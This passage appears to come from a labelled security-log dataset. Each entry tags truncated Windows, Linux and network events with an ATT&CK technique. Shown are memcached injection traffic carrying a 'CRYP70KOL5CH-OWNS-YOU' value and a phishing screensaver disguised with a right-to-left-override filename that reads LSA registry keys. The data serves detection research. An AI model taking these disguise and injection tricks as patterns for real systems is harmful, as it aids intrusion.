{"endtime":"2018-08-20T15:19:27.039111Z","timestamp":"2018-08-20T15:19:27.021995Z","bytes":196,"src_ip":"13.125.33.130","src_mac":"02:4F:D7:61:53:04","bytes_in":172,"packets_in":2,"protocol":"UDP","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","bytes_out":24,"packets_out":1,"flow_id":"299e417b-5220-405c-be42-6a696f0b243a","protoid":17,"version":4,"tos":0,"fragment_count":0,"protocol_stack || 4. {"endtime":"2018-08-20T15:19:27.039111Z","timestamp":"2018-08-20T15:19:27.021995Z","app":"udp","bytes":298,"bytes_in":240,"bytes_out":58,"dest_content":"\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000STORED\r\n","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","dest_port":11211,"flow_id":"299e417b-5220-405c-be42-6a696f0b243a","packets_in":2,"packets_out":1,"protocol_stack":"ip:udp:unknown" || 5. {"endtime":"2018-08-20T15:20:37.698260Z","timestamp":"2018-08-20T15:20:37.698180Z","bytes":48,"src_ip":"13.125.33.130","src_mac":"02:4F:D7:61:53:04","bytes_in":27,"packets_in":1,"protocol":"UDP","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","bytes_out":21,"packets_out":1,"flow_id":"b05a7d85-59af-4baa-a118-fb29409cc7d4","protoid":17,"version":4,"tos":0,"fragment_count":0,"protocol_stack": || 6. {"endtime":"2018-08-20T15:20:37.698260Z","timestamp":"2018-08-20T15:20:37.698180Z","app":"udp","bytes":116,"bytes_in":61,"bytes_out":55,"dest_content":"\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000END\r\n","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","dest_port":11211,"flow_id":"b05a7d85-59af-4baa-a118-fb29409cc7d4","packets_in":1,"packets_out":1,"protocol_stack":"ip:udp:unknown","sr || 7. {"endtime":"2018-08-20T15:20:47.589668Z","timestamp":"2018-08-20T15:20:47.589581Z","app":"udp","bytes":248,"bytes_in":64,"bytes_out":184,"dest_content":"\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000VALUE injected 0 105\r\nCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOU\r\nEND\r\n","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70"," || 8. {"endtime":"2018-08-20T15:20:47.589668Z","timestamp":"2018-08-20T15:20:47.589581Z","bytes":180,"src_ip":"13.125.33.130","src_mac":"02:4F:D7:61:53:04","bytes_in":30,"packets_in":1,"protocol":"UDP","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","bytes_out":150,"packets_out":1,"flow_id":"7a15c660-4d3f-44ca-b9f2-356fc7bc2ac2","protoid":17,"version":4,"tos":0,"fragment_count":0,"protocol_stack || 9. {"endtime":"2018-08-20T15:21:59.096662Z","timestamp":"2018-08-20T15:21:59.078615Z","bytes":225,"src_ip":"13.125.33.130","src_mac":"02:4F:D7:61:53:04","bytes_in":178,"packets_in":2,"protocol":"UDP","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","bytes_out":47,"packets_out":2,"flow_id":"a03dfaa9-7ac9-4199-8af0-45abc2685f7d","protoid":17,"version":4,"tos":0,"fragment_count":0,"protocol_stack || 10. {"endtime":"2018-08-20T15:21:59.096662Z","timestamp":"2018-08-20T15:21:59.078615Z","app":"udp","bytes":361,"bytes_in":246,"bytes_out":115,"dest_content":"\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000STORED\r\n\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000ERROR\r\n","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","dest_port":11211,"flow_id":"a03dfaa9-7ac9-4199-8af0-45abc2685f7d","packe || 11. {"endtime":"2018-08-20T15:22:39.897297Z","timestamp":"2018-08-20T15:22:39.882135Z","app":"udp","bytes":488,"bytes_in":246,"bytes_out":242,"dest_content":"\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000STORED\r\n\u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0000VALUE injected 0 105\r\nCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOUCRYP70KOL5CH-OWNS-YOU\r\nEND\r\n || 12. {"endtime":"2018-08-20T15:22:39.897297Z","timestamp":"2018-08-20T15:22:39.882135Z","bytes":352,"src_ip":"13.125.33.130","src_mac":"02:4F:D7:61:53:04","bytes_in":178,"packets_in":2,"protocol":"UDP","dest_ip":"172.16.0.178","dest_mac":"02:A0:38:1B:B3:70","bytes_out":174,"packets_out":2,"flow_id":"da9c27d6-3fa0-4ec2-a2bb-f80dc47baf4a","protoid":17,"version":4,"tos":0,"fragment_count":0,"protocol_stac
36
OTRF-Security-Datasets-atomic
windows
Pedro01
12
Defense Evasion
T1562.002
2022-08-03T07:01:35.259000+03:00
2022-08-08T15:50:53.952000+03:00
1. CommandInvocation(Get-Date): "Get-Date" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.18362.1 Host ID = f401e80c-3dda-42b0-917b-70a58aae3523 Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.18362.1 Runspace ID = 2df6de6d-4ed6-4209-b598-917823190d34 Pipeline ID = 51 Command Name = Get-Date Command Ty || 2. File created: RuleName: - UtcTime: 2022-08-03 23:01:35.272 ProcessGuid: {625b42a0-fe4b-62ea-8e05-000000000900} ProcessId: 7532 Image: C:\Windows\System32\RuntimeBroker.exe TargetFilename: C:\Users\IT01-Pedro\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_03_16_01_34_0065.txt~RF132d6a8.TMP CreationUtcTime: 2022-08-03 23:01:3 || 3. File created: RuleName: - UtcTime: 2022-08-03 23:01:35.272 ProcessGuid: {625b42a0-fe4b-62ea-8e05-000000000900} ProcessId: 7532 Image: C:\Windows\System32\RuntimeBroker.exe TargetFilename: C:\Users\IT01-Pedro\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_03_16_01_34_0065.txt.~tmp CreationUtcTime: 2022-08-03 23:01:34.006 Use || 4. CommandInvocation(Collection_Start_02.ps1): "Collection_Start_02.ps1" CommandInvocation(Out-Default): "Out-Default" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.18362.1 Host ID = f401e80c-3dda-42b0-917b-70a58aae3523 Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.18362.1 Runspace ID = 2df6de6d-4ed || 5. prompt || 6. File created: RuleName: - UtcTime: 2022-08-03 23:01:35.724 ProcessGuid: {625b42a0-fe4b-62ea-8e05-000000000900} ProcessId: 7532 Image: C:\Windows\System32\RuntimeBroker.exe TargetFilename: C:\Users\IT01-Pedro\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_03_16_01_34_0065.txt~RF132d86d.TMP CreationUtcTime: 2022-08-03 23:01:3 || 7. File Delete archived: RuleName: - UtcTime: 2022-08-03 23:01:35.724 ProcessGuid: {625b42a0-fe4b-62ea-8e05-000000000900} ProcessId: 7532 User: PEDRO01\IT01-Pedro Image: C:\Windows\System32\RuntimeBroker.exe TargetFilename: C:\Users\IT01-Pedro\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_03_16_01_34_0065.txt~RF132d86d.TMP Ha || 8. RawAccessRead detected: RuleName: - UtcTime: 2022-08-03 23:01:35.787 ProcessGuid: {625b42a0-4137-62e9-7500-000000000900} ProcessId: 4636 Image: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Device: \Device\HarddiskVolume1 User: PEDRO01\IT01-Pedro || 9. RawAccessRead detected: RuleName: - UtcTime: 2022-08-03 23:01:35.787 ProcessGuid: {625b42a0-4137-62e9-7500-000000000900} ProcessId: 4636 Image: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Device: \Device\HarddiskVolume1 User: PEDRO01\IT01-Pedro || 10. File Delete archived: RuleName: - UtcTime: 2022-08-03 23:01:35.898 ProcessGuid: {625b42a0-413b-62e9-7700-000000000900} ProcessId: 4856 User: PEDRO01\IT01-Pedro Image: C:\Windows\System32\RuntimeBroker.exe TargetFilename: C:\Users\IT01-Pedro\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133040248925052108.txt Hashes: SHA1=D1C020B3BE817A04F37B578 || 11. File created: RuleName: - UtcTime: 2022-08-03 23:01:37.350 ProcessGuid: {625b42a0-4109-62e9-2600-000000000900} ProcessId: 1408 Image: C:\Windows\system32\svchost.exe TargetFilename: C:\Windows\Prefetch\TRUSTEDINSTALLER.EXE-3CC531E5.pf CreationUtcTime: 2022-07-29 05:06:59.795 User: NT AUTHORITY\SYSTEM || 12. File created: RuleName: - UtcTime: 2022-08-03 23:01:37.397 ProcessGuid: {625b42a0-4109-62e9-2600-000000000900} ProcessId: 1408 Image: C:\Windows\system32\svchost.exe TargetFilename: C:\Windows\Prefetch\TIWORKER.EXE-F00CFF1A.pf CreationUtcTime: 2022-07-29 05:03:32.937 User: NT AUTHORITY\SYSTEM
37
Linux-APT-Dataset-2024
linux
21
8
Defense Evasion
T1027.005
2024-01-07T08:24:08.124000+03:00
2024-01-07T08:56:05.644000+03:00
1. sudo || 2. strings || 3. sudo || 4. strings || 5. sudo || 6. strings || 7. sudo || 8. strings
38
OTRF-Security-Datasets-compound
windows
SCRANTON.dmevals.local
12
Initial Access
T1566
2020-05-02T05:55:30.545000+03:00
2020-05-02T11:16:23.493000+03:00
1. A process has exited. Subject: Security ID: S-1-5-18 Account Name: SCRANTON$ Account Domain: DMEVALS Logon ID: 0x3E7 Process Information: Process ID: 0x23f4 Process Name: C:\Windows\System32\svchost.exe Exit Status: 0x0 || 2. File created: RuleName: - UtcTime: 2020-05-02 02:55:30.544 ProcessGuid: {47ab858c-cadd-5eac-2700-000000000400} ProcessId: 1720 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-05-02 01:21:29.933 || 3. "C:\ProgramData\victim\‮cod.3aka3.scr" /S || 4. "C:\ProgramData\victim\‮cod.3aka3.scr" /S || 5. A handle to an object was requested. Subject: Security ID: S-1-5-21-1830255721-3727074217-2423397540-1107 Account Name: pbeesly Account Domain: DMEVALS Logon ID: 0x3731F3 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xa8 Resource Attributes: - Process Information: Process ID: 0x214c Process Name: C:\ProgramData\victim\â || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-21-1830255721-3727074217-2423397540-1107 Account Name: pbeesly Account Domain: DMEVALS Logon ID: 0x3731F3 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0xa8 Resource Attributes: - Process Information: Process ID: 0x214c Process Name: C:\ProgramData\vict || 7. Network connection detected: RuleName: - UtcTime: 2020-05-02 02:55:59.631 ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400} ProcessId: 8524 Image: C:\ProgramData\victim\‮cod.3aka3.scr User: DMEVALS\pbeesly Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 10.0.1.4 SourceHostname: - SourcePort: 59835 SourcePortName: - DestinationIsIpv6: false DestinationIp: 192.168.0.5 DestinationHost || 8. Dns query: RuleName: - UtcTime: 2020-05-02 02:56:00.762 ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400} ProcessId: 8524 QueryName: SCRANTON QueryStatus: 0 QueryResults: fe80::e57e:d29d:b33d:4b45;::ffff:10.0.1.4; Image: C:\ProgramData\victim\‮cod.3aka3.scr || 9. Dns query: RuleName: - UtcTime: 2020-05-02 02:56:00.765 ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400} ProcessId: 8524 QueryName: 5.4.b.4.d.3.3.b.d.9.2.d.e.7.5.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa. QueryStatus: 0 QueryResults: type: 12 SCRANTON.dmevals.local; Image: C:\ProgramData\victim\‮cod.3aka3.scr || 10. Pipe Created: RuleName: - EventType: CreatePipe UtcTime: 2020-05-02 02:56:04.487 ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400} ProcessId: 8524 PipeName: <Anonymous Pipe> Image: C:\ProgramData\victim\‮cod.3aka3.scr || 11. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-05-02 02:56:04.487 ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400} ProcessId: 8524 PipeName: <Anonymous Pipe> Image: C:\ProgramData\victim\‮cod.3aka3.scr || 12. Pipe Created: RuleName: - EventType: CreatePipe UtcTime: 2020-05-02 02:56:04.487 ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400} ProcessId: 8524 PipeName: <Anonymous Pipe> Image: C:\ProgramData\victim\‮cod.3aka3.scr
39
BRAWL-Dataset
windows
escue-pc
12
Execution
T1059.001
2017-05-01T21:58:52.277000+03:00
2017-05-01T23:21:53.959000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "powershell" -command - || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
40
BOTS-v3-Splunk
windows
matar
4
Execution
T1059
2018-08-20T18:15:00+03:00
2018-08-21T02:54:35+03:00
1. {"endtime":"2018-08-20T15:15:00.339909Z","timestamp":"2018-08-20T15:15:00.143986Z","attach_disposition":["inline"],"attach_filename":["1534778082419.png"],"attach_size":[119666],"attach_size_decoded":[87446],"attach_transfer_encoding":["base64"],"attach_type":["image/png"],"bytes":133763,"bytes_in":133726,"bytes_out":37,"content":["DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;\r\n d=frothl || 2. {"endtime":"2018-08-20T15:19:35.131703Z","timestamp":"2018-08-20T15:19:34.777033Z","attach_disposition":["inline"],"attach_filename":["1534778082419.png"],"attach_size":[119666],"attach_size_decoded":[87446],"attach_transfer_encoding":["base64"],"attach_type":["image/png"],"bytes":133287,"bytes_in":133250,"bytes_out":37,"content":["DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;\r\n d=frothl || 3. {"endtime":"2018-08-20T23:50:00.339909Z","timestamp":"2018-08-20T23:50:00.143986Z","attach_disposition":["inline"],"attach_filename":["1534808982419.png"],"attach_size":[119666],"attach_size_decoded":[87446],"attach_transfer_encoding":["base64"],"attach_type":["image/png"],"bytes":133763,"bytes_in":133726,"bytes_out":37,"content":["DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;\r\n d=frothl || 4. {"endtime":"2018-08-20T23:54:35.131703Z","timestamp":"2018-08-20T23:54:34.777033Z","attach_disposition":["inline"],"attach_filename":["1534808982419.png"],"attach_size":[119666],"attach_size_decoded":[87446],"attach_transfer_encoding":["base64"],"attach_type":["image/png"],"bytes":133287,"bytes_in":133250,"bytes_out":37,"content":["DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;\r\n d=frothl
41
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Lateral Movement
T1021.003
2020-09-18T00:45:53.153000+03:00
2020-10-10T01:32:54.475000+03:00
1. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x3220 Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 2. A handle to an object was requested. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x3c8 Resource Attributes: - Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 3. An attempt was made to access an object. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x3c8 Resource Attributes: - Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost. || 4. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x3c8 Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 5. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x3220 Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x3c8 Resource Attributes: - Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x3c8 Resource Attributes: - Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost. || 8. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x3c8 Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 9. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x3220 Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x32c Resource Attributes: - Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe || 11. An attempt was made to access an object. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x32c Resource Attributes: - Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost. || 12. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x32c Process Information: Process ID: 0x14f8 Process Name: C:\Windows\System32\svchost.exe
42
Linux-APT-Dataset-2024
linux
21
7
Defense Evasion
T1070.004
2024-01-07T08:54:38.391000+03:00
2024-01-07T10:35:12.245000+03:00
1. sudo || 2. ls || 3. ls || 4. ls || 5. sudo || 6. rm || 7. ls
43
OTRF-Security-Datasets-compound
windows
NEWYORK.dmevals.local
12
Initial Access
T1566
2020-05-02T05:55:28.511000+03:00
2020-05-02T11:16:42.497000+03:00
1. Network connection detected: RuleName: - UtcTime: 2020-05-02 02:55:25.828 ProcessGuid: {32aa854b-c662-5eac-5a00-000000000300} ProcessId: 3960 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 10.0.0.4 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.2 DestinationHostname: - D || 2. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-05-02 02:55:46.405 ProcessGuid: {32aa854b-c662-5eac-5a00-000000000300} ProcessId: 3960 PipeName: \lsass Image: C:\windows\system32\dns.exe || 3. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: NEWYORK$ Account Domain: DMEVALS Logon ID: 0x58F45B Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege || 4. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: NEWYORK$ Account Domain: DMEVALS.LOCAL Logon ID: 0x58F45B Linked Logon ID: 0x0 Network Account Name: - || 5. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: NEWYORK$ Account Domain: DMEVALS Logon ID: 0x58F45B Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 6. Network connection detected: RuleName: - UtcTime: 2020-05-02 02:55:54.907 ProcessGuid: {32aa854b-c662-5eac-4b00-000000000300} ProcessId: 3624 Image: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 57088 SourcePortName: - DestinationIsIpv6: true DestinationIp: || 7. Network connection detected: RuleName: - UtcTime: 2020-05-02 02:55:54.907 ProcessGuid: {32aa854b-c64c-5eac-0c00-000000000300} ProcessId: 704 Image: C:\Windows\System32\lsass.exe User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: true SourceIp: 0:0:0:0:0:0:0:1 SourceHostname: - SourcePort: 57088 SourcePortName: - DestinationIsIpv6: true DestinationIp: 0:0:0:0:0:0:0:1 Destination || 8. File created: RuleName: - UtcTime: 2020-05-02 02:56:10.459 ProcessGuid: {32aa854b-c655-5eac-2200-000000000300} ProcessId: 1536 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-05-02 01:02:09.939 || 9. Network connection detected: RuleName: - UtcTime: 2020-05-02 02:56:11.599 ProcessGuid: {32aa854b-c662-5eac-5a00-000000000300} ProcessId: 3960 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 10.0.0.4 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 10.0.1.6 DestinationHostname: - Dest || 10. Id = {C11E1664-7828-4AD0-B23A-0FCEF0EA26C0}; ClientMachine = NEWYORK; User = NT AUTHORITY\SYSTEM; ClientProcessId = 1588; Component = Unknown; Operation = Start IWbemServices::DeleteInstance - Root\Rsop\Computer : RSOP_ExtensionStatus.extensionGuid="{35378EAC-683F-11D2-A89A-00C04FBBCFA2}"; ResultCode = 0x80041002; PossibleCause = Unknown || 11. Id = {C11E1664-7828-4AD0-B23A-0FCEF0EA26C0}; ClientMachine = NEWYORK; User = NT AUTHORITY\SYSTEM; ClientProcessId = 1588; Component = Unknown; Operation = Start IWbemServices::DeleteInstance - Root\Rsop\Computer : RSOP_ExtensionStatus.extensionGuid="{0ACDD40C-75AC-47ab-BAA0-BF6DE7E7FE63}"; ResultCode = 0x80041002; PossibleCause = Unknown || 12. Id = {C11E1664-7828-4AD0-B23A-0FCEF0EA26C0}; ClientMachine = NEWYORK; User = NT AUTHORITY\SYSTEM; ClientProcessId = 1588; Component = Unknown; Operation = Start IWbemServices::DeleteInstance - Root\Rsop\Computer : RSOP_ExtensionStatus.extensionGuid="{0E28E245-9368-4853-AD84-6DA3BA35BB75}"; ResultCode = 0x80041002; PossibleCause = Unknown
44
BRAWL-Dataset
windows
fulco-pc
12
Execution
T1059.001
2017-05-01T21:58:10.108000+03:00
2017-05-01T23:21:11.319000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "powershell" -command - || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
45
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Lateral Movement
T1021.002
2020-08-05T10:48:29.659000+03:00
2020-09-22T21:54:02.626000+03:00
1. Network connection detected: RuleName: - UtcTime: 2020-08-05 07:48:23.009 ProcessGuid: {2b437147-0bbd-5f2a-4e00-000000000400} ProcessId: 3588 Image: C:\Windows\System32\dns.exe User: NT AUTHORITY\SYSTEM Protocol: udp Initiated: false SourceIsIpv6: false SourceIp: 172.18.38.5 SourceHostname: - SourcePort: 53 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.39.5 DestinationHostname: || 2. Network connection detected: RuleName: - UtcTime: 2020-08-05 07:48:27.345 ProcessGuid: {2b437147-0baf-5f2a-0f00-000000000400} ProcessId: 980 Image: C:\Windows\System32\svchost.exe User: NT AUTHORITY\NETWORK SERVICE Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 172.18.39.5 SourceHostname: - SourcePort: 60336 SourcePortName: - DestinationIsIpv6: false DestinationIp: 172.18.38.5 Destin || 3. File created: RuleName: - UtcTime: 2020-08-05 07:48:31.341 ProcessGuid: {2b437147-0bb1-5f2a-2300-000000000400} ProcessId: 1660 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-08-05 01:30:26.200 || 4. RawAccessRead detected: RuleName: - UtcTime: 2020-08-05 07:48:50.257 ProcessGuid: {2b437147-0bab-5f2a-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 5. RawAccessRead detected: RuleName: - UtcTime: 2020-08-05 07:48:50.257 ProcessGuid: {2b437147-0bab-5f2a-0c00-000000000400} ProcessId: 704 Image: C:\Windows\System32\lsass.exe Device: \Device\HarddiskVolume1 || 6. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2020-08-05 07:48:50.257 ProcessGuid: {2b437147-0ba4-5f2a-0100-000000000400} ProcessId: 4 PipeName: \ntsvcs Image: System || 7. A Kerberos service ticket was requested. Account Information: Account Name: pgustavo@THESHIRE.LOCAL Account Domain: THESHIRE.LOCAL Logon GUID: {3c4521f1-06a5-4d34-bc48-327597ad5d1a} Service Information: Service Name: MORDORDC$ Service ID: S-1-5-21-3669966080-2286457517-972388166-1000 Network Information: Client Address: ::ffff:172.18.39.5 Client Port: 60339 Additional Information: Ticket Options: || 8. A Kerberos service ticket was requested. Account Information: Account Name: pgustavo@THESHIRE.LOCAL Account Domain: THESHIRE.LOCAL Logon GUID: {3c4521f1-06a5-4d34-bc48-327597ad5d1a} Service Information: Service Name: krbtgt Service ID: S-1-5-21-3669966080-2286457517-972388166-502 Network Information: Client Address: ::ffff:172.18.39.5 Client Port: 60340 Additional Information: Ticket Options: 0x60 || 9. Special privileges assigned to new logon. Subject: Security ID: S-1-5-21-3669966080-2286457517-972388166-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0xCD87B2 Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege 